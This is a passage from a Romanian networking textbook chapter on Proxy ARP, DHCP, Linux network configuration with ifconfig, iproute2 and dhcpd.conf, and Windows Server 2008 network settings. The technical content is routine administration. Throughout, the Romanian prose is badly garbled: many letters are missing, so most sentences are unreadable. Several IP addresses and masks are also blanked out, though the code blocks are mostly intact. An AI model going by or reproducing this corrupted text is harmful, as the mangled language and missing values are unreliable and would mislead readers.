staţiile se o po tă a şi u toate desti aţiile s-a afla î eţeaua lo lo ală, a â d a ad esă
MAC adresa routerului. A easta î sea ă ă da ă o staţie ea să t a s ită ăt e t ei staţii
aflate î eţele dife ite, staţia su să a e ite t ei e e i A‘P âte u a pe t u fie a e . Ce e ile
o fi i te eptate şi li se a ăspu de de ăt e router; a easta du e la o eşte e a t afi ului,
p e u şi a di e siu ii ta elei A‘P de la i elul staţiei. Î azul default gateway staţia su să
a testa apa te e ţa desti aţiilo la eţeaua p op ie şi î azul î a e o se ă ă ele fa pa te
di altă eţea, staţia su să u a t i ite e e i A‘P di e t ăt e ele i o folosi ad esa MAC a
routerului i pli it pe a e o pot afla t i iţâ d o si gu ă e e e A‘P . Proxy ARP î a ă
routerul, a e t e uie să ăspu dă la e e ile A‘P desti ate staţiilo di afa a eţelei;
precizarea routerului i pli it î a ă staţiile, a e t e uie să testeze apa te e ţa staţiilo
desti aţie la eţeaua lo ală.
Deşi pa e fi eas ă î t e a ea a e di t e ele două etode este ai u ă, î eţelele
lo ale o petiţia s-a încheiat în favoarea metodei bazate pe folosirea routerului implicit.
“taţiile de lu u au de e it foa te pute i e î de u sul ulti ilo a i, astfel încât
dist i ui ea la i elul staţiilo a testului de apa te e ţă a su sei şi desti aţiei la a elaşi LAN
adu e a esto a o î ă a e ese ifi ati ă, eli e â d routerul de procesul decizional asociat
cu Proxy ARP.
Pe de altă pa te, î ă a ea routerului la rularea Proxy ARP u este se ifi ati ă, ai ales
pentru un router e o e tează o eţea lo ală. Di a est oti ajo itatea routerelor (toate
routerele CISCO spre exemplu) vor avea activat implicit Proxy ARP.
Î azul u ei eţele lo ale u ai ult de o si gu ă ieşi e de I te et, p e iza ea routerului
i pli it ofe ă u o t ol ult ai st i t al staţiilo , şi pe ite i ple e ta ea ala să ii pe
ază de su să a t afi ului.
Da ă s-ar a aliza st i t doa ele două p oto oale, o luzia a fi ă î azul î a e staţiile
o u i ă p epo de e t u alte staţii di ad ul a eleaşi eţele lo ale o u i aţia azată pe
folosirea routerului i pli it a fi le tă, dato ită testului supli e ta , î e e e pe t u azul
u ei eţele î a e ajo itatea t afi ului pă ăseşte eţeaua lo ală P o A‘P a e ite âte o
e e e A‘P pe t u fie a e ad esă desti aţie dife ită.
3.1.8 DHCP
DHCP (Dynamic Host Configuration Protocol) este un protocol client-server prin
i te ediul ă uia se e ul fu izează staţiei lie t pa a et ii de o figurare necesari
fu ţio ă ii î t -o eţea. DHCP ofe ă, de ase e ea, posi ilitatea o t olului a esului la
eţeaua lo ală pe ite iul ad esei fizi e , p e u şi o ilitate, uta ea di t -o eţea î alta
fii d posi ilă fă ă e o figu a ea a uală a gazdei.
DHCP fu izează u e a is p i a e se e ul at i uie ad ese IP lie ţilo . E istă t ei
odalităţi de alo a e a ad eselo IP: alo a e di a i ă, a uală sau auto ată.
Alo area di a i ă presupune definirea unui set de adrese IP. Adresele IP alocate sunt
î lătu ate di ulţi ea ad eselo dispo i ile, da î o e tul e pi ă ii pe ioadei de
î hi ie e da ă u este p elu git o t a tul de î hi ie e a estea se pot î toa e î zo a
ad eselo dispo i ile pe t u a apoi să fie alo ate u ui alt od de eţea. Perioada de închiriere
a ad eselo IP a iază î fu ţie de i ple e ta ea se e ului de DHCP, alo i uzuale fii d
sau 192 de ore.
Alo area a uală p esupu e defi i ea pe se e de aso ie i î t e ad ese MAC şi ad ese
IP. La primirea unei cereri DHCP, adresa MAC su să a fi ăutată î lista de aso ie i. Da ă u
e istă o aso ie e defi ită, î fu ţie de o figu aţie, se e ul poate ig o a e e ea, sau poate
te e î odul de alo a e di a i . Alo a ea a uală pe ite ad i ist ato ului
implementarea unor politi i de o t ol al a esului la eţea, fii d u a di t e p i ele
e o a dă i de se u iza e a eţelei lo ale. Î a elaşi ti p, pe ite u g ad de fle i ilitate
idi at î azul s hi ă ilo de topologie p e u apa iţia u ui ou se e de DHCP sau
schimbarea routerului de ieşi e di eţeaua lo ală default gateway).
Alo area auto ată î i ă si plitatea de o figu a e a alo ă ii di a i e t e uie doa
defi it setul de ad ese IP dispo i ile, şi u o listă de aso ie i MAC-IP) cu avantajele de
se u itate ale alo ă ii stati e: î azul u ui eţele u u ă de ad ese dispo i ile egal u el al
staţiilo o ouă staţie u a putea p i i pa a et ii de eţea, deoa e e o ad esă IP alo ată u
se ai î toa e î ulţi ea ad eselo dispo i ile de ât la esta ta ea se i iului de DHCP.
Fu ţio â d î eţeaua lo ală, DHCP u e esită u se i iu o ie tat pe o e iu e a e să
ofe e o t olul t afi ului, dete ta ea şi e tifi a ea e o ilo sau se e ţie ea o e tă a datelo .
U astfel de se i iu TCP a i t odu e î ă a e şi întârzieri nejustificate. De aceea, se
foloses datag a e UDP, pe po tul pe t u se e şi pe po tul pe t u lie t.
Co e saţia di t e lie t şi se e o stă î u ăto ii paşi:
1. La po i e, staţia lie t DHCP t i ite e e i pe t u i iţie ea o u i aţiei cu serverele DHCP.
Aceste cereri sunt trimise prin intermediul mesajelor BROADCAST de tip DHCPDISCOVER.
2. La p i i ea e e ilo , se e ul dete i ă da ă o poate o o a. Î az afi ati , se e ul
ăspu de u esaj UNICA“T de tip DHCPOFFE‘, a e poate i lude ad esa IP, as a de eţea,
106 | ‘ e ţ e l e L o a l e
ad esa gate a , ad esa se e ului de u e, p e u şi pe ioada de ala ilitate. Î az egati ,

e e ea poate fi t a s isă ai depa te, ăt e u alt se e DHCP DHCP relay).
3. Da ă ofe ta este a eptată de ăt e lie t, a esta va trimite un mesaj BROADCAST de tip
DHCP‘EQUE“T, î a e su t e uţi pa a et ii espe ti i. “e t i ite u esaj de tip
B‘OADCA“T şi u u ul de tip UNICA“T pe t u a sta ili a e se e a fost ales, î azul î a e
DHCPDISCOVER a ajuns la mai multe serve e. Î i ple e tă ile uzuale ale DHCP, staţia î epe
să foloseas ă ad esa IP alo ată, deşi p o esul de o fi a e î ă u s-a încheiat.
4. Serverul ales trimite un mesaj de confirmare UNICAST, de tip DHCPACK. În cazul în care adresa
a fost alo ată pâ ă la p imirea DHCPREQUEST, serverul va trimite un mesaj DHCPNACK,
procesul reluându-se de la pasul 1.
3.2 Definirea parametrilor de reţea în Linux

3.2.1 Configurarea temporară
Li u pu e la dispoziţie două utilita e pe t u o figu a ea i te feţelo de eţea,
configurare e se a pie de după epo i ea siste ului. P i ul di t e a estea este ifconfig.
P eze t pe toate platfo ele U i , a est utilita pe ite sta ili ea ad esei IP, a ăştii de eţea,
p e u şi a ad esei de difuza e.
Î e e plul de ai jos este p eze tată folosi ea o e zii fă ă p e iza ea e pli ită a ăştii
de eţea. Î a est az a fi o figu ată as a de eţea a lasei di a e fa e pa te ad esa,
pentru exemplul de faţă . . . , p e u şi ad esa de difuza e . . . .
# ifconfig eth0 192.1.3.2
Dacă se do eşte at i ui ea ad esei . . . / o t e ui p e izate e pli it atât as a de

eţea, ât şi ad esa de difuza e:
# ifconfig eth0 192.1.3.1 netmask 255.255.255.252 broadcast 192.1.3.63
Comanda ifconfig ai poate fi folosită atât pe t u i spe ta ea o figu aţiilo u e te de

eţea, a pa a et ilo de fu ţio a e: MTU, u ă de pa hete t i ise, u ă de pa hete
primite, etc
# ifconfig eth0
eth0 Link encap:Ethernet HWaddr 00:0A:95:E2:04:D4
inet addr:10.38.252.237 Bcast:10.38.255.255 Mask:255.255.0.0
inet6 addr: fe80::20a:95ff:fee2:4d4/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:553119 errors:0 dropped:0 overruns:0 frame:0
TX packets:904848 errors:0 dropped:0 overruns:0 carrier:0
[...]
Pe t u fie a e i te faţă fizi ă de eţea pot fi defi ite ai ulte i te feţe logi e, de u ite
su i terfețe. Di pu t de ede e logi , fie a e su i te faţă a u ui router ep ezi tă o
i te faţă disti tă. Di a est oti două su i te feţe u pot a ea ad ese IP di a eeaşi
su eţea. Î e e plul de ai jos su t defi ite ad esa IP, as a de eţea şi ad esa de difuza e
pe t u i te faţa eth : , adi ă pe t u u a di t e su i te feţele i te feţei eth :
# ifconfig eth0:1 42.1.3.1 netmask 255.255.0.0 broadcast 42.1.255.255
Toţi pa a et ii de eţea se esetează la op i ea i te feţei e poate fi fă ută spe ifi pe t u

o i te faţă sau p i epo i ea se i iului de eţea, ea e du e la ei iţializa ea tutu o
i te feţelo de eţea. Co figu aţiile te po a e de eţea se o pie de î azul deza ti ă ii
i te feţei. Î azul u ei su i te feţe deza ti a ea este e hi ale tă u şte ge ea sa.
# ifconfig eth0:1 down
# /etc/init.d/rc.d/networking restart
Î epâ d de la e siu ea de ke el . a apă ut u pa het de utilita e pe t u a ipula ea

o figu ă ilo de eţea, u os ut su u ele iproute. Ajuns la cea de a doua versiune
(iproute2 , el ep ezi tă o alte ati ă pute i ă, pe iţâ d ealiza ea de setă i foa te

sofisticate.
Pe t u o figu a ea pa a et ilo de eţea se foloseşte utilita ul ip addr, parte a
pachetului iproute. Î azul apelă ii o e zii doa u ad esa IP, a fi o figu ată as a
. . . , altfel spus p efi ul de eţea / :
# ip addr add dev eth0 192.168.38.11
# ip addr show eth0
2: eth0: <BROADCAST,MULTICAST,UP> mtu 1500 qdisc pfifo_fast qlen 1000
link/ether 00:0a:95:e2:04:d4 brd ff:ff:ff:ff:ff:ff
inet 192.168.38.11/32 scope global eth0
Astfel, pe t u o figu a ea u ui i te feţe este e esa ă p e iza ea ad esei IP, a p efi ului
de eţea, p e u şi a ad esei de difuza e:
# ip addr add dev eth0 192.168.38.11/24 broadcast 192.168.38.255
# ip addr show eth0
inet 192.168.38.11/24 brd 192.168.38.255 scope global eth0
Pentru a defi i o figu aţii pe t u su i te feţe este folosită opţiu ea label. Din motive
de o pati ilitate, se e o a dă a u ele eti hetelo să î eapă u u ele i te feţei.
Astfel, pentru eth0 etichete valide sunt: eth00, eth0.0, eth0:0, eth0-test. Pe t u ă
ifconfig ede eti hetele a pe o i te faţă i tuală, el u poate ula de ât u ele de tip
interfaţă:număr.
# ip addr add dev eth0 192.168.38.11/24 broadcast 192.168.38.255 label eth0:0
# ip addr show label eth0:0
inet 192.168.38.11/24 brd 192.168.38.255 scope global eth0:0
Pe t u a ti a ea sau deza ti a ea u ei i te feţe, sau şte ge ea o figu aţiilo logi e

aso iate u o su i te faţă se foloseşte u alt utilita al pa hetului iproute2: ip link. De
e e plu, pe t u a î hide i te faţa eth0 se poate folosi comanda:
ip link set eth0 down
Utilitarul ip link ai poate fi util pe t u s hi a ea pa a et ilo de i el legătu ă de

date ad esă MAC, MTU, et , p e u şi la afişa ea a esto pa a et i:
# ip link show
1: lo: <LOOPBACK,UP> mtu 16436 qdisc noqueue
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
Pe lâ gă fu ţiile de a ipula e a ta elei de uta e şi de defi i e a tu elelo , iproute2

ofe ă supo t şi pe t u de politi i de t afi traffic shaping).
3.2.2 Configurarea permanentă

Pe t u o figu a ea pe a e tă a pa a et ilo de eţea este folosit fişie ul
/etc/network/interfaces.
A est fişie este spe ifi dist i uţiei De ia î alte dist i uţii lo aţia sa poate fi dife ită şi
o ţi e i fo aţiile e esa e pe t u o figu a ea i te feţelo de eţea. P og a ele a e
efe ti utilizează a est fişie su t ifup şi ifdown şi su t ulate di /etc/init.d/networking,
s ipt espo sa il de o figu a ea eţelei, î p o esul de po i e al siste ului de ope a e.
Pe t u defi i ea stati ă a pa a et ilo de eţea ad i ist ato ul poate specifica: adresa IP,
as a de eţea, ad esa default gateway, adresa serverului de nume, etc, sau doar o parte
di t e a eşti pa a et i. De ase e ea, pot fi spe ifi ate alte a ţiu i a e să fie ealizate atu i
â d i te faţa este po ită, espe ti op ită:
auto eth0
108 | ‘ e ţ e l e L o a l e
iface eth0 inet static

address 192.168.1.3
netmask 255.255.255.0
gateway 192.168.1.1
dns-nameservers 192.168.1.2
up echo $IFACE up
down echo $IFACE down
up route add -host 192.168.38.100 gw 192.168.1.17
În exemplul de mai sus, interfeţei eth0 îi este at i uită ad esa . . . / , ad esa

routerului implicit este 192.168.1.1, serverul de DNS 192.168.1.2. La ridicarea (activarea)
i te feţei a fi afişat esajul „eth0 up şi a fi adăugată î ta ela de uta e o ută ăt e
eţeaua . . . / eţea fo ată di t -o si gu ă ad esă u u ăto ul hop
192.168.1.17.
Pe t u o ţi e ea di a i ă a pa a et ilo de eţea este editat tot fişie ul
/etc/network/interfaces. “p e e e plu, pe t u a o figu a di a i i te faţa eth0:
auto eth0
iface eth0 inet dhcp
Oi e odifi ă i pe a e te o fi apli ate doa î u a epo i ii se i iului de eţea:

#/etc/init.d/networking restart
3.3 Configurarea serviciului DHCP pe un server Linux

3.3.1 )nstalarea şi configurarea serverului D(CP
“e e ul DHCP p i eşte e e i de la lie ţii di eţea şi fu izează a esto a pa a et ii IP
e esa i fu ţio ă ii o espu zătoa e.
Pe t u i stala ea e siu ii a se e ului se foloseşte pa hetul dhcp3-server. Pachetul
dhcp o ţi e e siu ea a se e ului de DHCP:
#apt-get install dhcp3-server
Odată o figu at, se e ul poate fi a ipulat p i i te ediul s iptului de i iţializa e:

#/etc/init.d/dhcp {start | stop | reload | force-reload}
sau folosind comanda dhcpd, ca utilizator privilegiat.

Comanda dhcpd permite specifi a ea alto pa a et i de fu ţio a e ai se e ului, sp e
e e plu, u ă ul po tului pe a e să p i eas ă e e i o fo ‘FC , a esta este :
#dhcpd -p NUMAR_PORT
“pe ifi a ea altui po t de ât el i pli it poate fi utilă î p o esul de depa a e sau în

se u iza ea eţelei.
Fişie ul de o figu a e al se e ului DHCP este /etc/dhcpd.conf. De ase e ea, fişie ul
/var/lib/dhcp/dhcpd.leases păst ează aza de date a lie ţilo DHCP pe t u se e ul
respectiv.
Fişie ul de o figu a e păst ează i fo aţii desp e lie ţii di eţea. Î ad ul lui, pot fi
de la ate opţiu i glo ale, apli a ile tutu o lie ţilo , sau opţiu i pe t u fie a e lie t sau
g up de lie ţi.
Co side â d a est aspe t, e istă două tipu i de spe ifi aţii î ad ul fişie ului dhcpd.conf:
pa a et ii şi de la aţii.
De larațiile su t folosite pe t u a des ie topologia eţelei sau lie ţii, şi p e izează
ad esele a e pot fi at i uite lie ţilo . E istă pat u tipu i de de la aţii a e o tu ează
topologia eţelei: host, goup, subnet şi shared-network.
De la aţia host este folosită atu i â d se do eşte spe ifi a ea pa a et ilo de

fu ţio a e pe t u o a u ită gazdă de e e plu, alo a ea stati ă a ad esei IP, î fu ţie de
adresa MAC).
De la aţia group folosită atu i â d se do eşte g upa ea ai ulto lie ţi spe ifi aţi u
de la aţia host. A eşti lie ţi o a ea u set o u de pa a et i.
De la aţia su et t e uie fă ută pe t u fie a e su eţea dese ită de se e ul de DHCP.
De la aţia shared-network este folosită î azul î a e e istă ai ulte su eţele
declarate cu subnet, care vor avea un set comun de parametri de configurare.
Atu i â d se e ul DHCP p i eşte o e e e, a o sulta ai î tâi de la aţia host a
lie tului da ă e istă , după a e de la aţia group da ă e istă , apoi de la aţia subnet
pe t u su eţeaua di a e a e it e e ea. U ează de la aţia shared-network, în final fiind
o sultaţi pa a et ii glo ali.
Parametrii p e izează da ă t e uie ealizată o a ţiu e de e e plu, da ă se e ul DHCP
t e uie să fu izeze ad esa u ui lie t eide tifi at , u t e uie ealizată o a ţiu e de
e e plu, ât ti p u lie t poate păst a o a u ită ad esă IP sau pa a et ii de o figu a e
a e t e uie fu izaţi lie tului de e e plu, spe ifi a ea se e ului DN“ a e a fi folosit .
Î ad ul pa a et ilo , pot e ista opţiu i. Opţiu ile su t pa a et i fa ultati i spe ifi aţi
folosind cuvântul cheie option. ‘estul pa a et ilo fie spe ifi ă odul de fu ţio a e al
serverului, fie sunt obligatorii, conform protocolului DHCP .
Mai jos sunt p eze taţi âţi a pa a et i des î tâl iţi î o figu a ea DHCP:
group{
option routers 192.168.1.1;
option subnet-mask 255.255.255.0;
option broadcast-address 192.168.1.255;
option domain-name-server 141.87.37.2;
}
 option domain-name-servers ADRESA [, ADRESA1 ...]: spe ifi ă se e ul

(serverele) de nume pe care le va folosi clientul;
 option subnet-mask MASCA_DE_RETEA: as a de eţea a e a fi fu izată lie ţilo ;
 option broadcast-address ADRESA: ad esa de oad ast fu izată lie ţilo ;
 option routers ADRESA: adresa default a gateway-ului;
host gazda1{
hardware ethernet 00:02:55:F3:12:F0;
fixed-address 192.168.1.3;
}
 hardware HARDWARE-TYPE HARDWARE-ADDRESS: pa a et u folosit pe t u e u oaşte ea

lie ţilo ;
 HARDWARE-TYPE: implementate Ethernet şi Token-Ring (nu mai e folosit).
 fixed-address ADRESA [, ADRESA1 ...]: pa a et u folosit pe t u at i ui ea stati ă a
uneia sau mai multor adrese IP.
subnet 192.168.1.0 netmask 255.255.255.0{
[parametri]
range 192.168.1.3 192.168.1.34;
}
 range ADRESA1 ADRESA2: i te alul di a e o fi at i uite di a i ad ese IP lie ţilo ,

pe t u o a u ită su eţea:
allow unknown-clients
deny unknown-clients
 allow/deny: o t olează o po ta e tul se e ului DHCP î azul î a e p i eşte e e i de

la lie ţi e u os uţi.
U fişie de o figu a e poate a ea st u tu a u ătoa e:
shared-network reteaua1{
[parametri de retea]
110 | ‘ e ţ e l e L o a l e
group{
[parametri de grup]
subnet ADRESA1 netmask MASCA1{

[parametri de subretea]
}
subnet ADRESA2 netmask MASCA2{
[parametri de subretea]
}
host NUME{
[parametri de host]
}
}
host NUME1{
[parametri de host]
}
}
Fişie ul poate o ţi e spaţii, li ii goale sau ta -u i adiţio ale pe t u fo ata e. “i ta a

este case-insensitive, o e ta iile î epâ d u # şi sfâ şi du-se u li ie ouă.
“ hi ă ile fă ute fişie ului de o figu a e o a ea efe t după esta ta ea se erului:
/etc/init.d/dhcp restart
U alt fişie pe t u o figu a ea se e ului DHCP este /etc/default/dhcp. Aici pot fi

spe ifi ate, de e e plu, i te feţele pe a e se e ul să as ulte e e i DHCP folosi d de la aţia
INTERFACES).
3.3.2 DHCP Relay

DHCP Relay permite transmiterea cererilor DHCP dintr-o su eţea î a e u e istă se e
DHCP ăt e u ul sau ai ulte se e e DHCP di alte su eţele.
Pentru instalare, este necesar pachetul dhcp-relay:
apt-get install dhcp-relay
Agentul DHCP poate fi configurat la po i e, p i pa a et ii t a s işi o e zii dhcrelay,

sau p i i te ediul fişie ului /etc/default/dhcp-relay.
Î a est fişie se pot spe ifi a:
 i te feţele pe a e age tul să p i eas ă e e i DHCP: de la aţia INTE‘FACE“;
 se e ele DHCP ăt e a e să fie t i ise e e ile DHCP p i ite: de la aţia DHCP_“E‘VE‘“.
3.3.3 Exemplu de configurare DHCP

Este prezentat în continuare un exemplu de configurare DHCP.
“e e ul staţia MPL“ a e două plă i de eţea, fie a e di t e a estea fă â d pa te di t -o
su eţea, şi a fu iza ad ese IP gazdelo di su eţeaua . . . / di i te alul
192.168.1.10 - . . . , ia gazdelo di su eţeaua . . . / di i te alul
10.16.200.5-10.16.200.150.
Două di staţiile di eţea MPL“ şi MPL“ o o ţi e ad ese IP şi pa a et i de
configurare, prima în mod dinamic, iar cea de-a doua în mod static.
I te feţele se e ului DHCP su t o figu ate astfel:
root@MPLS4:/etc# cat network/interfaces
auto lo
iface lo inet loopback
# Prima interfata
auto eth0
name Ethernet LAN card
address 192.168.1.1
broadcast 192.168.1.255
netmask 255.255.255.0
network 192.168.1.0
# A doua interfata
auto eth1

address 10.16.200.1
broadcast 10.16.200.255
netmask 255.255.255.0
network 10.16.200.0
Fişie ul de o figu a e al se e ului este:

root@MPLS4:/etc# cat dhcpd.conf
option domain-name "test.ro";
option domain-name-servers 192.168.1.1;
option subnet-mask 255.255.255.0;
default-lease-time 600;
max-lease-time 7200;
# Grupul celor doua subretele
# Au in comun timpii de valabilitate
group{
# Timpul default de valabilitate pentru acest grup
default-lease-time 2000;
# Timpul maxim de valabilitate pentru acest grup
max-lease-time 8000;
# Prima subretea
subnet 192.168.1.0 netmask 255.255.255.0{
range 192.168.1.10 192.168.1.20;
}
# A doua subretea
subnet 10.16.200.0 netmask 255.255.255.0{
range 10.16.200.5 10.16.200.150;
}
# Gazda configurata static
host gazda1{
hardware ethernet 00:02:55:F3:12:F0;
fixed-address 192.168.1.3;
}
}
Cele două staţii date a e e plu su t o figu ate după u u ează:

root@MPLS-2:/etc/network# cat interfaces
auto lo
# The primary network interface
auto eth0
root@MPLS3:/etc# cat /etc/network/interfaces
auto lo
auto eth0
La po i ea staţiilo , sau â d este epo it se i iul de eţea, a estea o i iţia o

o e saţie u se e ul DHCP î u a ă eia o o ţi e ad esele IP şi pa a et ii de
configurare.
root@MPLS3:/etc# /etc/init.d/networking restart
Setting up IP spoofing protection: rp_filter.
Reconfiguring network interfaces...ifup: interface lo already configured
Internet Software Consortium DHCP Client 2.0pl5
[...]
Listening on LPF/eth0/00:02:55:f3:12:f0
Sending on LPF/eth0/00:02:55:f3:12:f0
Sending on Socket/fallback/fallback-net
DHCPREQUEST on eth0 to 255.255.255.255 port 67
DHCPNAK from 192.168.1.1
DHCPDISCOVER on eth0 to 255.255.255.255 port 67 interval 8
DHCPOFFER from 192.168.1.1
DHCPACK from 192.168.1.1
bound to 192.168.1.3 - renewal in 1000 seconds.
done.
112 | ‘ e ţ e l e L o a l e
Î azul staţiei MPL“ se o se ă ă a fost at i uită ad esa . . . , deoa e e a eastă

staţie a e ad esa fizi ă : : :f : :f , spe ifi ată u pa a et ul host î fişie ul de
configurare al serverului.
root@MPLS-2:/etc/network# /etc/init.d/networking restart
Setting up IP spoofing protection: rp_filter.
Reconfiguring network interfaces...
ifup: interface lo already configured
[...]
Listening on LPF/eth0/00:02:55:f3:0c:02
Sending on LPF/eth0/00:02:55:f3:0c:02
Sending on Socket/fallback/fallback-net
DHCPNAK from 192.168.1.1
DHCPOFFER from 192.168.1.1
DHCPACK from 192.168.1.1
bound to 192.168.1.11 - renewal in 1000 seconds.
done.
Î azul staţiei MPL“ ad esa at i uită este u ătoa ea ad esă li e ă di i te alul de

adrese specificat, respectiv 192.168.1.11 .
3.4 Configurarea adreselor de reţea în Windows Server 2008

Windows Server 2008 p ezi tă două zo e p i ipale î a e este posi ilă o figu a ea
pa a et ilo de eţea: Network and Sharing Center şi Network Connections.
3.4.1 Network and Sharing Center

Network and Sharing Center reprezintă p i ipalul utilita de o figu a e a eţelei î
Windows Server 2008. El poate fi a esat î u ul di t e u ătoa ele odu i:
 Din meniul Start, clic dreapta pe Network şi se sele tează Properties;
 În System Tray de u it şi Notification Area , da ă este afişată pi tog a a de o e ti itate la
eţea, p i t -u li pe a easta u at de sele ţia opţiu ii Network and Sharing Center din
meniu;
 Din Control Panel, accesând Network and Internet urmat de Network and Sharing Center (sau
direct accesând Network and Sharing Center pentru Control Panel în modul Classic View).
3-11: Network and Sharing Center în Windows Server 2008
Atât î azul eţelelo a late ât şi pe t u ele wireless, Network and Sharing Center
at i uie u a di t e ele t ei lo aţii posi ile: public, private şi domain. A este lo aţii ep ezi tă
pa a et i e su t setaţi pe t u o i e al ulato e ulează Wi do s Vista sau Windows Server
2008, fiecare configurându-şi apa te e ţa la eţea p i t -u a di t e ele t ei lo aţii. Dife ite
p op ietăţi ale eţelei pot fi a ti ate sau deza ti ate auto at î fu ţie de tipul ei.
I pli it, toţi lie ţii su t e i ai u ei lo aţii de tip public. Pentru un astfel de calculator,
Windows Firewall este activ, serviciul de Network Discovery este op it, pa taja ea fişie elo şi a
i p i a tei este deza ti ată ia ge e a ea u ei hă ţi a eţelei Network Map) este
i dispo i ilă.
Câ d u al ulato este asig at u ei lo aţii de tip private serviciul de Nework Discovery şi
Network Map su t a ti ate. Pa taja ea fişie elo este op ită, da , sp e deose i e de lo aţia
public, pa taja ea poate fi a ti ată i di idual şi i depe de t pe fie a e al ulato .
Da ă u al ulato de i e e u al u ui do e iu Active Directory, el este automat
i lus î lo aţia de tip domain. Me ii a estei lo aţii e efi iază de ap o i ati a eeaşi
o figu aţie a şi ei di tipul de lo atie private, u e epţia ă pa a et ii Windows Firewall,
Network Discovery şi Network Map sunt determinate de politicile de grup ale domeniului
(Group Policy Settings).
114 | ‘ e ţ e l e L o a l e
3-12: Exemplu de Network Map
O s hiţă a eţelei Network Map pe ite afişa ea î od g afi a e hipa e telo

o e tate la eţeaua lo ală şi a odului î a e a estea su t i te o e tate, p e u şi
legătu a la I te et.
Pentru ca un Network Map să poată fi ge e at su t e esa e două o po e te î eţea:
 Link Layer Topology Discovery (LLTD) Mapper este o po e ta a e i te oghează elelalte
dispozitive di eţea şi a e ge e ază Network Map-ul.
 LLTD Responder este o po e ta i te ogată, a e ăspu de e e ilo e ite de la LLTD
Mapper
Cele două o po e te su t i stalate i pli it doa pe Wi do s Vista şi Windows Server

2008, da este posi ilă i stala ea unui LLTD Responder şi pe u al ulato e ulează Wi do s
XP, pe iţâ du-i a estuia să fie „ ăzut de ăt e u LLTD Mapper di eţea e ge e ează u
Network Map.
Alte opţiu i dispo i ile î Network and Sharing Center:
 Network Discovery: Permite calculatorului p op iu să poată lo aliza alte al ulatoa e di eţea
şi să poată fi lo alizat, la â dul său. Opţiu ea poate fi setată pe On, Off sau poate avea
valoarea Custom, sp e e e plul î situaţia î a e Network Discovery este activ dar firewall-ul
u deţi e o egulă pe t u a pe ite fu ţio a ea sa î eţea.
 File Sharing: Pa taja ea fişie elo eează auto at o pe isiu e î firewall pentru ca
p oto olul să poată fu ţio a. A ti a ea File Sharing-ului pe ite utilizato ilo să pa tajeze
fişie ele di p op iul p ofil, adi ă di %systemroot%\Users\%username%. Administratorii de
siste pot pa taja o i e fişie di al ulato .
 Public Folder Sharing: Î di e to ul de p ofil al fie ă ui utilizato e istă u su di e to u it
Public care este automat partajat în mome tul a ti ă ii a estei opţiu i. La a ti a ea Public
Folder Sharing este a ti ată auto at şi opţiu ea de File Sharing.
 Printer Sharing: Opţiu ea ofe ă posi ilitatea de pa taja e a a esului la i p i a tele i stalate
local, pentru a putea fi folosite de ori e alt al ulato di eţea. De ase e a, a ti a ea a este
opţiu i a e a efe t şi a ti a ea opţiu ii de File Sharing.
 Password Protected Sharing: Opţiu ea este dispo i ilă doa pe siste ele a e u su t
e e ale u ui do e iu. Î o e tul a ti ă ii sale, accesul la resursele locale partajate este
est i ţio at doa pe t u ei a e au u o t alid de utilizato pe al ulato ul gazdă.
3.4.2 Network Connections

Windows Server 2008 dete tează şi o figu ează auto at o e iu ile aso iate i te feţelo
de eţea di sistem. Aceste conexiuni sunt listate în Network Connections, alătu i de alte
conexiuni configurate manual, cum ar fi cele de tip dial-up, VPN-uri sau conexiuni de tip
PPPoE.
Network Connections poate fi accesat în mai multe moduri:
 Din Server Manager, clic pe View Network Connections;
 Din fereastra Initial Configuration Tasks afişată de la p i a la sa e a siste ului, după

instalare), clic pe Configure Networking;
 Di i te faţa Network and Sharing Center, clic pe Manage Network Connections;
 De la meniul Start, scriind comanda ncpa.cpl sau control netconnections fie în câmpul
de Search, fie la Run.
Co e iu ile î si e u pe it al ulatoa elo să o u i e p i t -o eţea. Î ealitate,

lie ţii, se i iile şi p oto oalele î o te tul o e iu ilo su t ele a e pe it o u i aţia
î t e două sau ai ulte staţii. Î fe east a de p op ietăţi a o e iu ilo su t afişaţi lie ţii,
p oto oalele şi se i iile ataşate a elei o e iu i. U a di t e odalităţile de a afişa
p op ietăţile u ei o e iu i este di Network Connections, prin clic dreapta pe una dintre
o e iu i şi apoi li pe Properties, di e iu. De ase e ea, se poate aju ge ai i şi di
Network and Sharing Center, prin clic pe View Status şi apoi pe Properties, în dreptul
conexiunii dorite.
Elementele bifate i di ă o po e te e su t ataşate o e iu ii espe ti e:
3-13: Fereastra de proprietăți ale u ei o e iu i
 Network Clients: Într-o eţea Wi do s, lie ţii su t o po e te soft a e a e pe it u ei

staţii să se o e teze u u a u it siste de ope a e di eţea. I pli it, si gu ul lie t
disponibil pentru toate conexiunile locale este Client for Microsoft Networks. Acesta permite
al ulatoa elo e ulează Wi do s să se o e teze şi să pa tajeze esu se între ele.
 Network Services: “e i iile su t o po e te soft a e e ofe ă fu ţio alităţi supli e ta e
conexiunilor. File and Printer Sharing for Microsoft Networks şi QoS Packet Scheduler su t două
di t e se i iile ataşate i pli it tutu o o e iu ilo locale. File and Printer Sharing for
Microsoft Networks pe ite al ulato ului să pa tajeze fişie e pe t u a fi a esate di eţea.
QoS Packet Scheduler ofe ă o t ol asup a t afi ului di eţea, u posi ilitatea de a p io itiza
a u ite flu u i de date şi servicii.
 Network Protocols: Cal ulatoa ele o u i ă p i t -o conexiune doar prin intermediul
p oto oalelo ataşate a elei o e iu i. “upo tul pe t u IP şi IP este i lus i pli it pe t u
116 | ‘ e ţ e l e L o a l e
toate o e iu ile lo ale, alătu i de supo tul pe t u LLTD Mapper şi LLTD Responder (descrise în
se ţiu ea 3.4.1).
Este posi ilă izualiza ea setă ilo a a sate pe t u o e iu ile di Network Connections.
Pentru aceasta, din fereastra Network Connections, se alege opţiu ea Advanced Settings din
meniul Advanced1:
3-14: “etări a a sate ale o e iu ilor di Net ork Co e tio s
Î fe east a de setă i a a sate, la atego ia Adapters and Bindings su t afişate

conexiunile curente, î o di ea p io ităţilo . Modifi a ea o di ii o e iu ilo , de i ajusta ea
p io ităţilo , a e a efe t fo ţa ea siste ului de ope a e î î e a ea de a o u i a p i
a u ite o e iu i î o di ea defi ită de ad i ist ato . De ase e ea, se poate o figu a şi
o di ea ataşă ii se i iilo pe t u fie a e o e iu e î pa te, î pa tea de jos a fe est ei.
3.4.3 Vizualizarea parametrilor de reţea

Co figu aţia IP a u ei i te feţe p esupu e el puţi o ad esă IP şi o as ă de eţea sau
o ad esa IP şi u p efi de eţea. Pe lâ gă a este o figu aţii i i ale, se pot egăsi şi
